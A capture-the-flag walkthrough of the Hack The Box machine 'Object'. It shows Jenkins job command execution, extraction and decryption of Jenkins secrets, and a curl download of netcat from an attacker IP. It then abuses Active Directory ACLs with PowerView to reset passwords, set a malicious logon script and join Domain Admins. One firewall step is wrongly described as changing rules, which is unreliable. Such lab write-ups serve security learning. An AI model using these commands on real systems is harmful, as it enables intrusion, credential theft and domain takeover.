This post is about the Walkthrough of the hackthebox machine: Object
Hackthebox Object Walkthrough Link to heading
Reconnaissance Link to heading
Port-Scan Link to heading
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.129.96.147
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-28 20:59 EDT
Nmap scan report for 10.129.96.147
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 13.92 seconds
┌──(rocky㉿kali)-[~/hckbox/object]
└─$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.129.96.147
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-28 21:00 EDT
Nmap scan report for 10.129.96.147
Host is up (0.15s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
53/udp open domain
Vulnarability scan Link to heading
sudo nmap -Pn -p 80,5985,8080 -sC -sV -oN details1.txt 10.129.96.147
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-29 01:42 EDT
Nmap scan report for 10.129.96.147
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Front page Link to heading
It has front page on port 80 and jenkins login page on 8080. The default login credentials dont work. However we can simply create a new account and login.
Jenkins Version: 2.317
Directory Scan Link to heading
Not much useful infomation obtained
obuster dir -u http://10.129.96.147 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.96.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/29 19:45:42 Starting gobuster in directory enumeration mode
===============================================================
Progress: 45658 / 207644 (21.99%)[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
Progress: 45666 / 207644 (21.99%)[ERROR] 2022/06/29 19:57:02 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
[ERROR] 2022/06/29 19:57:02 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
Directory scan on port 8080 with authentication
Jenkins url with authentication
Nikto Scan also does not reveal much details
DNS enumeration Link to heading
Checking for any subdomains
gobuster dns -d object.htb -w /usr/share/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: object.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
2022/06/29 20:01:58 Starting gobuster in DNS enumeration mode
===============================================================
===============================================================
2022/06/29 20:13:35 Finished
============================================================
More DNS enumeration
I could not find more on on DNS service.
Exploiting the Jenkins Link to heading
I can see 2.3.1.7 is the version running. However I could not find an exploit working for this version. There are few methods suggested since we have login access to dashboard. We run some jobs directly on server using this dashboard. In the jobs it can excecute the commands which can used for enumeration.
Running the jobs using the schedule option Link to heading
There should a build now button for Jenkins project. However this user dont seems to have the privilege for it. So we can try scheduling option. We can try running every minute.
We can create test projects and assign tasks and run as scheduled, We can try to run some system commands using this:
Build using Method2 : using API token Link to heading
Another method to run remote command are using API tokens.
As per the method mentioned on the dashboard, it seems not working throws the Authentication error
There is [post](How to implement a remote Jenkins build trigger with a URL - Coffee Talk: Java, News, Stories and Opinions) explains how to use the build job with API with username and password.
Below Format worked with username and password:
http://rchitect:11615d4b57ec7969e28bc5f405895060f7@object.htb:8080/job/rchitect's%20job/build?token=rchitectToken
Powershell Commands Link to heading
Since we tried basic windows commands, lets try some powershell commands. However it did not work. It seems some firewall rules are in place to block these connections.
Commands to initiate a webrequest (Invoke-Webrequest)
powershell -c iwr http://10.10.14.5 -UseBasicParsing
Let’s use some powershell commands to identify the firewall rules which is blocking.
Command:
powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
This one shows a firewall rule name and let’s try to reveal the details of this rule. The below [post](How to display firewall rule ports numbers with PowerShell) explain on these commands to understand the details of specific rules using the powershell commands:
Command mentioned on this post:
Get-NetFirewallRule -DisplayGroup 'Remote Desktop' |
Format-Table -Property Name,
DisplayName,
DisplayGroup,
@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},
@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},
@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},
@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},
Enabled,
Profile,
Direction,
Action
Since we identified the rule name earlier we can modify the above command with as per our scenario and modify the extra space as well. New command as follows:
powershell -c "Get-NetFirewallRule -DisplayName 'BlockOutboundDC' | Format-Table -Property DisplayName,@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}}, Enabled, Profile,Direction,Action"
Or You can simply try the first command to find the rule and add | to find the details like below:
powershell -c "Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block |
Format-Table -Property
DisplayName,
@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},
@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},
@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},
Enabled,
Profile,
Direction,
Action"
Link to heading
Chnging the Firewall rule Action Link to heading
Now we know the rule name which is blocking,let’s try to chnage the action to allow. However we need to cosider that there can be many rules which should be blocking the access even if we change the action for specific rule given above. So lets chnage the action from “block” to “Allow” for every outbound direction rules.
Command as follows:
powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Once we change the action to Allow with above command it returns many values, This shows many rules were present with block action and we have chnaged them to Allow. Refer full output here.
lets try to ping from Jenkins server to Kali machine.
Even if the ping test is succesful, I did try to download the netcat through the cmd and some how it did not work.
Command
cmd.exe /c curl http://10.10.14.20:8040/nc64.exe -o nc64.exe
Something is blocking at server level still and i did not receive any connection request at my http-server.
Jenkins Password enumeration Link to heading
This [document](How to reset the user/password of Jenkins on Windows? - Stack Overflow) talks about a ‘config.xml’ where the configuration related to password is stored in Jenkins configuration.
From previous job we understand the directory where the job is running which is ‘C:\Users\oliver\AppData\Local\Jenkins.jenkins\workspace\rchitect-test’
As per the above document we need to find the “config.xml”.
Pwershell commands used here:
powershell -c ls ..\..
We canview this file using the powershell command and copy the contents of it.
The command touse to view the file:
powershell -c Get-Content C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035\config.xml
The full file can be seen here. Apart from the configxml file there are few more files required to decode the password of Jenkins as per this [post](GitHub - hoto/jenkins-credentials-decryptor: Command line tool for dumping Jenkins credentials.).
I could see a some files under this secret folder which may be related to password.
The last file seems a binary and lets encode to base 64 using powercat or certutil
Either of these commands commands can be used for converting the binary file to encode to base 64 format so we can export it local kali machine
certutil -encode C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret hudson.b64
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\rchitect-test>powershell -c [convert]::ToBase64String((cat ..\..\secrets\hudson.util.Secret -Encoding byte))
Shell as Oliver Link to heading
Decrypting Jenkins password-Method1 Link to heading
There are few methods expplained over internet to crack the jenkins credentials.
One is explained [here.](GitHub - hoto/jenkins-credentials-decryptor: Command line tool for dumping Jenkins credentials.)
Decrypting Jenkins password-Method2 Link to heading
Method2 is to use the python script available [here](pwn_jenkins/jenkins_offline_decrypt.py at master · gquere/pwn_jenkins · GitHub).
We have access to the server with the password obtained:
Privilege escalation from Oliver to smith: Link to heading
I could see many ports open which are not shown during the nmap scan. It seems aactive directy service running on server.
Command to check the ports listening on server
netstat -an | findstr LISTENING
Powerview Enumeration Link to heading
Let’s use the Powerview to enumarate Active directory. I have uploaded the file like this to windows( location C:\ProgramData)
Make sure to activate the script by using below command
Import-Module .\PowerView.ps1
After reviewing, i can see the current user ia having the “GenericAll rights” through which we can chnage the password of other user without knowing the current password
Get-ObjectAcl -SamAccountName Oliver -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
AceType : AccessAllowed
ObjectDN : CN=Olivar Ava,CN=Users,DC=object,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1103
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-4088429403-1159899800-2753317549-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Olivar Ava,CN=Users,DC=object,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1103
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-548
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
Trying to chnage the passowrd like this and it does not work
*Evil-WinRM* PS C:\programdata> whoami; net user smith Password#123
object\oliver
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied.*Evil-WinRM* PS C:\programdata>
So this method works
Evil-WinRM* PS C:\programdata> $rchitect = ConvertTo-SecureString 'Rch1tect' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $rchitect
Login as Smith
$ evil-winrm -i 10.129.96.147 -u smith -p Rch1tect
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smith
Privilege escalation from smith to maria Link to heading
As user smith has a permission of “WriteProperty”. I will try to chnage the passowrd like we did earlier for “smith”. However it did not work.
* PS C:\programdata> Get-ObjectAcl -SamAccountName smith -ResolveGUIDs
ObjectDN : CN=Smith William,CN=Users,DC=object,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1104
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
AceQualifier : AccessAllowed
ObjectDN : CN=Smith William,CN=Users,DC=object,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server-License-Server
*Evil-WinRM* PS C:\programdata> $rchitect2 = ConvertTo-SecureString 'Rch2tect' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity maria -AccountPassword $rchitect2
Warning: [Set-DomainUserPassword] Error setting password for user 'maria' : Exception calling "SetPassword" with "1" argument(s): "Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))"
tried mutile methods and below one worked
└─$ evil-winrm -i 10.129.45.28 -u smith -p Rch1tect 1 ⨯
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> cd c:\programdata
*Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/11/2022 6:17 PM 770279 PowerView.ps1
*Evil-WinRM* PS C:\programdata> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{serviceprincipalname='nonexistent/rchitect'}
*Evil-WinRM* PS C:\programdata> Get-DomainUser maria | Select serviceprincipalname
serviceprincipalname
--------------------
nonexistent/rchitect
*Evil-WinRM* PS C:\programdata> setspn -a MSSQLSvc/object.local:1433 object.local\maria
Checking domain DC=object,DC=local
Registering ServicePrincipalNames for CN=maria garcia,CN=Users,DC=object,DC=local
MSSQLSvc/object.local:1433
Updated object
*Evil-WinRM* PS C:\programdata> Get-DomainUser maria | Select serviceprincipalname
serviceprincipalname
--------------------
{MSSQLSvc/object.local:1433, nonexistent/rchitect}
*Evil-WinRM* PS C:\programdata> echo "ping 10.10.14.3" > ping.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\ping.ps1"}
*Evil-WinRM* PS C:\programdata> echo "ls \users\maria\ > \programdata\out" > cmd.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\cmd.ps1"}
*Evil-WinRM* PS C:\programdata> type out
Directory: C:\users\maria
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/22/2021 3:54 AM 3D Objects
d-r--- 10/22/2021 3:54 AM Contacts
d-r--- 10/25/2021 3:47 AM Desktop
d-r--- 10/25/2021 10:07 PM Documents
d-r--- 10/22/2021 3:54 AM Downloads
d-r--- 10/22/2021 3:54 AM Favorites
d-r--- 10/22/2021 3:54 AM Links
d-r--- 10/22/2021 3:54 AM Music
d-r--- 10/22/2021 3:54 AM Pictures
d-r--- 10/22/2021 3:54 AM Saved Games
d-r--- 10/22/2021 3:54 AM Searches
d-r--- 10/22/2021 3:54 AM Videos
*Evil-WinRM* PS C:\programdata> type out
Directory: C:\users\maria
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/22/2021 3:54 AM 3D Objects
d-r--- 10/22/2021 3:54 AM Contacts
d-r--- 10/25/2021 3:47 AM Desktop
d-r--- 10/25/2021 10:07 PM Documents
d-r--- 10/22/2021 3:54 AM Downloads
d-r--- 10/22/2021 3:54 AM Favorites
d-r--- 10/22/2021 3:54 AM Links
d-r--- 10/22/2021 3:54 AM Music
d-r--- 10/22/2021 3:54 AM Pictures
d-r--- 10/22/2021 3:54 AM Saved Games
d-r--- 10/22/2021 3:54 AM Searches
d-r--- 10/22/2021 3:54 AM Videos
*Evil-WinRM* PS C:\programdata> echo "ls \users\maria\documents > \programdata\out; ls \users\maria\desktop\ > \programdata\out2" > cmd.ps1
*Evil-WinRM* PS C:\programdata> ls out*
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/11/2022 6:39 PM 0 out
-a---- 7/11/2022 6:39 PM 830 out2
*Evil-WinRM* PS C:\programdata> type out2
Directory: C:\users\maria\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2021 8:13 AM 6144 Engines.xls
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/11/2022 6:39 PM 186 cmd.ps1
-a---- 7/11/2022 6:40 PM 0 out
-a---- 7/11/2022 6:40 PM 830 out2
-a---- 7/11/2022 6:29 PM 36 ping.ps1
-a---- 7/11/2022 6:17 PM 770279 PowerView.ps1
*Evil-WinRM* PS C:\programdata> cd out2
*Evil-WinRM* PS C:\programdata> echo "copy \users\maria\desktop\Engines.xls \programdata\" > cmd.ps1
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/11/2022 8:57 PM 108 cmd.ps1
-a---- 10/26/2021 8:13 AM 6144 Engines.xls
-a---- 7/11/2022 8:57 PM 0 out
-a---- 7/11/2022 8:57 PM 830 out2
-a---- 7/11/2022 6:29 PM 36 ping.ps1
-a---- 7/11/2022 6:17 PM 770279 PowerView.ps1
*Evil-WinRM* PS C:\programdata> download c:\programdata\Engines.xls /home/rocky/tool/exp/windows/AD/Engines.xls
Info: Downloading c:\programdata\Engines.xls to /home/rocky/tool/exp/windows/AD/Engines.xls
Info: Download successful!
The file contain few password and i have tested and one of the password works.
crackmapexec winrm 10.129.45.28 -u maria -p enginespass
WINRM 10.129.45.28 5985 NONE [*] None (name:10.129.45.28) (domain:None)
WINRM 10.129.45.28 5985 NONE [*] http://10.129.45.28:5985/wsman
WINRM 10.129.45.28 5985 NONE [-] None\maria:d34gb8@
WINRM 10.129.45.28 5985 NONE [-] None\maria:0de_434_d545
WINRM 10.129.45.28 5985 NONE [+] None\maria:W3llcr4ft3d_4cls (Pwn3d!)
Lets login with maria.
evil-winrm -i 10.129.45.28 -u maria -p W3llcr4ft3d_4cls
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami
object\maria
Lets review the properies of user maria. “writeowner” permission is found.
AceType : AccessAllowed
ObjectDN : CN=maria garcia,CN=Users,DC=object,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1106
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
*Evil-WinRM* PS C:\programdata> Get-ObjectAcl -SamAccountName maria -ResolveGUIDs
With the rights user maria having, we can modify the owner of the group.
Evil-WinRM* PS C:\programdata> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
*Evil-WinRM* PS C:\programdata>
As an owner, we can provide full rights to user maria and add the user to group.
*Evil-WinRM* PS C:\programdata> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
I could not see the groups added. Then i did exit and login again
*Evil-WinRM* PS C:\programdata> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
After exit and login
Evil-WinRM* PS C:\programdata> exit
Info: Exiting with code 0
┌──(rocky㉿kali)-[~/hckbox/object]
└─$ evil-winrm -i 10.129.45.28 -u maria -p W3llcr4ft3d_4cls
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins Group S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
We have root flag
*Evil-WinRM* PS C:\Users\maria\Documents> cd C:\users
*Evil-WinRM* PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2021 3:20 AM Administrator
d----- 10/26/2021 7:59 AM maria
d----- 10/26/2021 7:58 AM oliver
d-r--- 4/10/2020 10:49 AM Public
d----- 10/21/2021 3:44 AM smith
*Evil-WinRM* PS C:\users> cd Administrator
*Evil-WinRM* PS C:\users\Administrator> cd Desktop
*Evil-WinRM* PS C:\users\Administrator\Desktop> ls
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/11/2022 6:15 PM 34 root.txt